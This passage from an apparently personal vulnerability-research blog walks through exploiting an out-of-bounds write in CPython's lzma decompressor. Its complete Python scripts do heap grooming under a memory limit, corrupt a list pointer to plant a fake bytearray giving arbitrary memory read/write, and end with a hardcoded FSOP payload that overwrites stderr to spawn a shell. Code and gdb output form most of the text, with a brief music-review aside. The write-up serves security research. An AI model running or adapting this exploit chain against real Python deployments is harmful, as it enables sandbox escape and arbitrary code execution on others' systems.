Now, let’s continue on to the second decompress call.
We of course pass the lzs->next_in != NULL check. Both avail_now and avail_total are size_t, and since input_buffer and input_buffer_size in d are still 0, the subtractions underflow and wrap around to enormous values rather than going negative. Neither avail_total < len nor avail_now < len holds, so we bypass the PyMem_Realloc and memmove logic entirely. We now land on the memcpy as expected!
──────────────────────────────────────── arguments (guessed) ────
memcpy@plt (
   $rdi = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
   $rsi = 0x00007ffff77e8c40 → "AAAAAAAAAAAAAAAA",
   $rdx = 0x0000000000000010,
   $rcx = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
──────────────────────────────────────── source:../Modules/_lzmamodule.c+1025 ────
   1020      else if (avail_now < len) {
   1021          memmove(d->input_buffer, lzs->next_in,
   1022                  lzs->avail_in);
   1023          lzs->next_in = d->input_buffer;
   1024      }
         // data=0x00007fffffff9ea0 → [...] → "AAAAAAAAAAAAAAAA", lzs=0x00007fffffff9ec0 → [...] → 0xff1422255f124a10
 → 1025      memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
   1026      lzs->avail_in += len;
   1027      input_buffer_in_use = 1;
   1028  }
   1029  else {
   1030      lzs->next_in = data;
We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!
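The branch selection and the destination address can be replayed outside the debugger. Below is a small Python model of the next_in != NULL block, assuming 64-bit size_t and pointer arithmetic (hence the mask); prepend_branch is a name I made up, and the inputs are the values from the gdb session with input_buffer and input_buffer_size left at 0.

```python
MASK = (1 << 64) - 1  # size_t and pointer arithmetic wrap at 64 bits


def prepend_branch(input_buffer, input_buffer_size, next_in, avail_in, length):
    """Model which path the next_in != NULL block takes.

    Returns (path, memcpy destination). The destination is only computed
    for the path that skips both the realloc and the memmove.
    """
    avail_now = ((input_buffer + input_buffer_size) - (next_in + avail_in)) & MASK
    avail_total = (input_buffer_size - avail_in) & MASK
    if avail_total < length:
        return "realloc", None
    if avail_now < length:
        return "memmove", None
    return "memcpy only", (next_in + avail_in) & MASK


# input_buffer was never allocated (the malloc failed), so both fields are 0.
path, dest = prepend_branch(0, 0, 0x7ffff6bda06c, 0x100054, 16)
print(path, hex(dest))
```

The computed destination is 0x7ffff6cda0c0, the same value gdb shows in $rdi for the memcpy call.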
Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off because the fact that a large buffer should be landing in the glibc heap instead is part of why the next few sections are so messy. Regardless, we cringe on.
Going Places
Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Foetus has hella alt names), all being some variation on D.* Yellow Swans. Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans… “Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.
Anyways, let’s try to upgrade our primitive.
Finer Memory Control
Right now, our memory exhaustion is being triggered by, well, dumb luck. We happen to have just enough memory that malloc only fails at the specific block we want, and this quickly becomes extremely unreliable once you so much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.
We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something that’s sort of, but not exactly (but maybe it actually is?) heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few that should, ideally, be adjacent:
import resource
import lzma
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)  # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
    while True:
        # sprayyyy
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
# these should be side by side?
fillers.pop()
fillers.pop()
c = bytearray(
    b'\xfd7zXZ\x00...'  # shrunk down to 2kB
)
d = bytearray(len(c))
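As an aside, the set-then-restore dance around RLIMIT_AS is easy to get wrong while experimenting, so here is a minimal sketch of wrapping it in a context manager. The name `address_space_limit` is hypothetical (it is not part of the `resource` module), and clamping to the hard limit is my own assumption about what is convenient here.

```python
import contextlib
import resource


@contextlib.contextmanager
def address_space_limit(limit_bytes: int):
    """Temporarily lower the soft RLIMIT_AS, restoring the old value on exit."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    # An unprivileged process cannot set the soft limit above the hard limit.
    if hard != resource.RLIM_INFINITY:
        limit_bytes = min(limit_bytes, hard)
    resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, hard))
    try:
        yield limit_bytes
    finally:
        resource.setrlimit(resource.RLIMIT_AS, (soft, hard))


# Usage sketch (not executed here): allocations inside the block start
# raising MemoryError once the process hits the limit.
#
# with address_space_limit(32 * 1024 * 1024):
#     fillers = []
#     try:
#         while True:
#             fillers.append(bytearray(2 * 1024))
#     except MemoryError:
#         pass
```

The `finally` does the same job as the `finally:` blocks in the later scripts: the limit gets lifted again even if the spray blows up somewhere unexpected.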
We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.
...
        if (lzret == LZMA_STREAM_END) {
            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
            break;
        } else if (lzs->avail_out == 0) {
            /* Need to check lzs->avail_out before lzs->avail_in.
               Maybe lzs's internal state still have a few bytes
               can be output, grow the output buffer and continue
               if max_lengh < 0. */
            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
                break;
            }
            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
                goto error;
            }
...
If lzs->avail_out is 0 and the output buffer already holds max_length bytes, we break out of decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero, which satisfies both conditions immediately. So we can get decompress_buf to exit early, reliably, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:
import resource
import lzma
import os
import ctypes
def heap_addr(b: bytearray) -> int:
    buf = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(buf)
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)  # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
c = bytearray(
    b'\xfd7zXZ\x00...'  # shrunk down to 2kB
)
d = bytearray(len(c))
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()
try:
    print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
    print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0)  # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)
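The max_length=0 trick from the script can be poked at in isolation, with no memory pressure involved. This is a minimal sketch using only the public `lzma` API; the `drain` helper and the test data are made up for illustration.

```python
import lzma

plain = b"A" * 4096
blob = lzma.compress(plain)

dec = lzma.LZMADecompressor()

# max_length=0: the decompressor may not hand back any output, so the
# call returns immediately and keeps the unread input for later.
first = dec.decompress(blob, 0)


def drain(d: lzma.LZMADecompressor, max_calls: int = 64) -> bytes:
    """Keep asking for output without feeding new input until EOF (bounded)."""
    out = b""
    for _ in range(max_calls):
        if d.eof:
            break
        out += d.decompress(b"")
    return out


rest = drain(dec)
print(len(first), len(rest), dec.eof)
```

On a healthy interpreter this is completely benign: the first call yields nothing and the follow-up calls recover the whole stream, which is why it makes such a convenient way to stop early.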
I’m cheating a little bit here with the ctypes crap for debugging purposes. Creating a bytearray creates a PyByteArrayObject that sits in the pyheap, whereas the memory that actually holds the data (and, more importantly, where the OOB write would occur) sits in the glibc heap and is only referenced by a pointer field in that struct. So calling id gets you the object’s address (the actually mutable crap), while the byte data sits elsewhere (somehow, this is relevant later).
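The difference between the object address and the data address can be checked on any CPython, exploit or not. A minimal sketch, assuming CPython (where `id` returns the object’s address); `data_address` is just the `heap_addr` helper from the script under a more descriptive name.

```python
import ctypes


def data_address(b: bytearray) -> int:
    """Address of the bytes a bytearray holds, not of the bytearray object itself."""
    view = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(view)


buf = bytearray(b"A" * 4096)
obj_addr = id(buf)             # where the PyByteArrayObject struct lives (CPython detail)
raw_addr = data_address(buf)   # where the 4096 data bytes live

print(hex(obj_addr), hex(raw_addr))

# Reading raw memory at raw_addr gives back the contents; mutations show up too.
buf[0] = 0x42
print(ctypes.string_at(raw_addr, 4))
```

For a buffer this size the two addresses typically land in visibly different ranges, matching the pyheap versus glibc heap split described above.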
Running this script, we now see that we can get allocations that are kissing (the gap between the two data addresses is 0x920 bytes: the ~2kB payload plus header and allocator overhead):
gef➤ r ../../test4.py
Starting program: ~/cpython/build-debug/python ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
gef➤ x/20gx 0x555556aba230-0x80
0x555556aba1b0: 0x0008808011910100 0xfb67c4b18c5a88ba
0x555556aba1c0: 0x5a59040000000002 0xfdfdfdfdfdfdfd00
0x555556aba1d0: 0xfdfdfdfdfdfdfdfd 0xddddddddddddddfd
0x555556aba1e0: 0xdddddddddddddddd 0x0000000000000921
0x555556aba1f0: 0xf108000000000000 0xfdfdfdfdfdfdfd72
0x555556aba200: 0xd908000000000000 0xfdfdfdfdfdfdfd6f
0x555556aba210: 0x0000000000000001 0x0000555555d3f060
0x555556aba220: 0x00000000000008b8 0xffffffffffffffff
0x555556aba230: 0x0000000000000000 0x0000000000000000
0x555556aba240: 0x0000000000000000 0x0000000000000000
Ok, two things:
- This OOB write in its current state is not very useful. We are now overflowing into another allocated data-carrying region, not the PyByteArrayObject that would actually be relevant. Even if we corrupt the chunk headers, it would probably be really difficult to expand this into something useful, especially with a garbage collector in the way. It’s basically impossible to land our LZMA buffer in the pyheap while also fulfilling the memory exhaustion criteria, so we need to be more creative with our overwrite.
- What the fuck is up with the fd and dd bytes? I didn’t put those there.
The Punishment for Using a Debug Build
Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:
When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on Python memory allocators to detect memory errors.
The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).
The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().
These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns.
Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE).
Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE).
Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.
The purpose of this padding is to help developers catch exactly these OOB bugs: when a block is later freed or resized, the debug hooks check the forbidden bytes around it and abort the interpreter with a fatal error if any were overwritten. This is actually incredibly useful and an amazing feature.
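With that layout in mind, some of the weird qwords in the earlier dump start making sense. Below is a minimal sketch that decodes the two qwords at 0x555556aba1f0, assuming (my reading of the dump, not something verified against the allocator source) that they are a debug-hook block header: the requested size stored big-endian, followed by a one-character API identifier and seven forbidden bytes. The function name is hypothetical.

```python
import struct

PYMEM_FORBIDDENBYTE = 0xFD


def decode_debug_header(size_qword: int, id_qword: int):
    """Decode the 16 bytes the debug hooks place in front of a block.

    Both arguments are the little-endian qwords as gdb's x/gx prints them.
    Returns (requested_size, api_id, padding_intact).
    """
    size_bytes = struct.pack("<Q", size_qword)   # back to raw memory order
    id_bytes = struct.pack("<Q", id_qword)
    requested_size = int.from_bytes(size_bytes, "big")  # stored big-endian
    api_id = chr(id_bytes[0])                           # 'r', 'm' or 'o'
    padding_intact = all(b == PYMEM_FORBIDDENBYTE for b in id_bytes[1:])
    return requested_size, api_id, padding_intact


size, api_id, intact = decode_debug_header(0xF108000000000000, 0xFDFDFDFDFDFDFD72)
print(hex(size), api_id, intact)
```

Under that reading, the backwards-looking 0xf108… value is just a size field in the other byte order, and the lone 0x72 is the identifier for the raw allocator domain.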
However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.
Actually Getting Arb R/W
Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…
When allocating a large list, the backing array (i.e. the actual region of memory which contains the pointers to the objects in the list) is thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make a list element point to a fake PyObject…
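To see that backing array from inside Python, here is a minimal sketch that reads a list’s item pointer with ctypes. It assumes CPython’s usual list layout (object header, then size, then the pointer to the items); the offset computation and both helper names are my own and are not a stable API.

```python
import ctypes

PTR = ctypes.sizeof(ctypes.c_void_p)


def list_items_pointer(lst: list) -> int:
    """Address of the array of PyObject* that backs `lst` (CPython layout assumption)."""
    # object header, then the ssize_t length, then the items pointer
    offset = object.__basicsize__ + ctypes.sizeof(ctypes.c_ssize_t)
    return ctypes.c_void_p.from_address(id(lst) + offset).value


def list_slot(lst: list, index: int) -> int:
    """The raw pointer stored in slot `index` of the backing array."""
    return ctypes.c_void_p.from_address(list_items_pointer(lst) + index * PTR).value


d = list(range(256 + 5))
print(hex(id(d)), hex(list_items_pointer(d)))
print(hex(list_slot(d, 0)), hex(id(d[0])))
```

Each slot is nothing more than the address of the element, which is exactly why overwriting one slot is enough to make `d[0]` resolve to whatever memory we choose.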
import resource
import lzma
import struct
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()
payload = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
    + b'A'*(2048-32+10)
)
c = bytearray(
    payload
)
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
x = bytearray(2048-10)
e = b'A'*(2048-10)  # once again, some fuckery to hit OOM
Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ x/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
0x7ffff75b67f0: 0x0000000000000001 0x0000555555c35fa0
0x7ffff75b6800: 0x000000000000080b 0x000000000000080b
0x7ffff75b6810: 0x0000555556b023b0 0x0000555556b023b0 <-- this is the backing array address
0x7ffff75b6820: 0x0000000000000000 0x0000555556b02390
gef➤ x/20gx 0x0000555556b023b0
0x555556b023b0: 0x0400005a587a37fd 0x0000000046b4d6e6 <-- our LZMA data is here
0x555556b023c0: 0x7df3b61f2144df1c 0x5a59040000000001
0x555556b023d0: 0x4141414141414164 0x4141414141414141
0x555556b023e0: 0x4141414141414141 0x4141414141414141
0x555556b023f0: 0x4141414141414141 0x4141414141414141
0x555556b02400: 0x4141414141414141 0x4141414141414141
0x555556b02410: 0x4141414141414141 0x4141414141414141
0x555556b02420: 0x4141414141414141 0x4141414141414141
0x555556b02430: 0x4141414141414141 0x4141414141414141
0x555556b02440: 0x4141414141414141 0x4141414141414141
gef➤ x/8gx 0x7ffff779f500 <-- this is the PyListObject of d
0x7ffff779f500: 0x0000000000000001 0x0000555555c47900
0x7ffff779f510: 0x0000000000000105 0x0000555556b02bd0 <-- this is the backing array address
0x7ffff779f520: 0x0000000000000105 0x00000000006e6f6d
0x7ffff779f530: 0x00007ffff779f431 0x00007ffff779f770
gef➤ x/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
0x555556b02b90: 0x4141414141414141 0x4141414141414141
0x555556b02ba0: 0x4141414141414141 0x4141414141414141
0x555556b02bb0: 0x4141414141414141 0x0000000000414141
0x555556b02bc0: 0x0000000000000000 0x0000000000000831
0x555556b02bd0: 0x0000555555c7e860 0x0000555555c7e880
0x555556b02be0: 0x0000555555c7e8a0 0x0000555555c7e8c0
0x555556b02bf0: 0x0000555555c7e8e0 0x0000555555c7e900
0x555556b02c00: 0x0000555555c7e920 0x0000555555c7e940
0x555556b02c10: 0x0000555555c7e960 0x0000555555c7e980
0x555556b02c20: 0x0000555555c7e9a0 0x0000555555c7e9c0
gef➤
Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.
Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughtless, and stupidly unreliable (even adding a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).
So let’s get the following:
- Our fake struct in the heap that we can get the heap address of, done by making a large bytes object (not a bytearray)
- A PIE leak (trivially done by leaking id(int) and calculating the offset)
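The reason a bytes object works for the first point is that its contents are stored inline, right after a fixed-size header, so the payload address is just `id` plus a constant. A minimal sketch, assuming CPython; the helper name is hypothetical, and deriving the header size from `bytes.__basicsize__` is my own shortcut rather than anything official.

```python
import ctypes


def bytes_payload_address(b: bytes) -> int:
    """Address of the first content byte of a bytes object (CPython assumption).

    bytes.__basicsize__ counts the header plus one trailing byte, so the
    content starts at header size == __basicsize__ - 1.
    """
    return id(b) + bytes.__basicsize__ - 1


blob = b"fake struct goes here" + b"A" * 2048
addr = bytes_payload_address(blob)

print(hex(bytes.__basicsize__ - 1))   # header size on this interpreter
print(ctypes.string_at(addr, 21))     # reads the contents straight from memory
```

On a regular 64-bit build that header is 0x20 bytes (refcount, type, size, hash), so no separate heap leak or offset guessing is needed to know where the fake struct sits.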
Our script now looks like this:
import resource
import lzma
import struct
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()
faker = (
    b'd\x00\x00\x00\x00\x00\x00\x00'  # ob_refcnt (non-zero)
    + struct.pack("<q", id(bytearray))  # ob_type
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_size
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_alloc
    + struct.pack("<q", id(int)-0x6f4680)  # ob_bytes (buffer pointer, we do PIE base)
    + struct.pack("<q", id(int)-0x6f4680)  # ob_start (just keep it the same)
    + b'\x00\x00\x00\x00\x00\x00\x00\x00'  # ob_exports
    + b'A'*2048  # padding to fall into glibc heap
)
lzma_buffer = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
    + b'A'*(2048-32+10)
)
c = bytearray(
    lzma_buffer
)
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i
print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
x = bytearray(2048-10)
e = b'A'*(2048-10)  # once again, some fuckery to hit OOM
decompressor = lzma.LZMADecompressor()
try:
    print(f"Original data at {hex(id(c))}")
    print(f"Next thing at {hex(id(d))}")
    print(f'Fake struct at {hex(id(faker))}')
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0)  # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
    b'\x00'*6  # padding between our kissing objects
    + struct.pack("<q", 0x0)
    + struct.pack("<q", 0x831)  # do not fuck the glibc header
    + struct.pack("<q", id(faker)+0x20),  # address of our fake struct, +0x20 to account for the header
    1)
input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")
print(d[0][:256])
If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!
➜ build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')
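Since the fake bytearray starts at the ELF base, any absolute address turns into an index by subtracting that base. Here is a minimal sketch of a wrapper that hides the subtraction; the `AbsoluteMemory` class is hypothetical, and the example runs against an ordinary bytearray standing in for the corrupted `d[0]`.

```python
import struct


class AbsoluteMemory:
    """Read and write by absolute address through a window that starts at `base`."""

    def __init__(self, window, base: int):
        self.window = window   # anything sliceable like a bytearray, e.g. d[0]
        self.base = base       # absolute address that index 0 corresponds to

    def _index(self, addr: int) -> int:
        if addr < self.base:
            raise ValueError("address is below the start of the window")
        return addr - self.base

    def read(self, addr: int, size: int) -> bytes:
        i = self._index(addr)
        return bytes(self.window[i:i + size])

    def write(self, addr: int, data: bytes) -> None:
        i = self._index(addr)
        self.window[i:i + len(data)] = data

    def u64(self, addr: int) -> int:
        return struct.unpack("<Q", self.read(addr, 8))[0]


# Stand-in demo: 64 zero bytes pretending to live at the leaked ELF base.
ELF_BASE = 0x55DE9A8B6000
mem = AbsoluteMemory(bytearray(64), ELF_BASE)
mem.write(ELF_BASE + 8, struct.pack("<Q", 0xDEADBEEF))
print(hex(mem.u64(ELF_BASE + 8)))
```

In the real exploit the window would be `d[0]` and the base would be `id(int)-0x6f4680`, but the bookkeeping is identical.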
Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.
# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])
libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))
elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00
p64 = lambda x: struct.pack('<Q', x)
input("pause...")
fsop = b''.join([
    b" sh\x00\x00\x00\x00",  # 0x00: flags
    p64(0),  # 0x08: _IO_read_ptr
    p64(0),  # 0x10: _IO_read_end
    p64(0),  # 0x18: _IO_read_base
    p64(0),  # 0x20: _IO_write_base
    p64(1),  # 0x28: _IO_write_ptr
    p64(0) * 7,  # 0x30 - 0x60: write_end, buf_base... to markers
    p64(system),  # 0x68: chain
    p64(0) * 3,  # 0x70 - 0x80: fileno, old_offset, cur_column
    p64(stderr + 0x210),  # 0x88: _lock (needs to point to writable nulls)
    p64(0),  # 0x90: _offset
    p64(stderr),  # 0x98: _codecvt
    p64(stderr - 0x48),  # 0xa0: _wide_data
    p64(0) * 6,  # 0xa8 - 0xd0: freeres, pad, mode, unused
    p64(wfile_jumps)  # 0xd8: vtable
])
print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop
And we get a shell :)
![]() |
|---|
| Fig: Winner winner chicken dinner |
Conclusion
Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).
So what did I learn from this?
- The Python debug build padding thing.
- How to throttle Python script resources.
- That’s about it, actually; the rest of the pwn stuff was neither complex nor novel to me.
Hopefully, you at least found this entertaining. Okay, ciao.


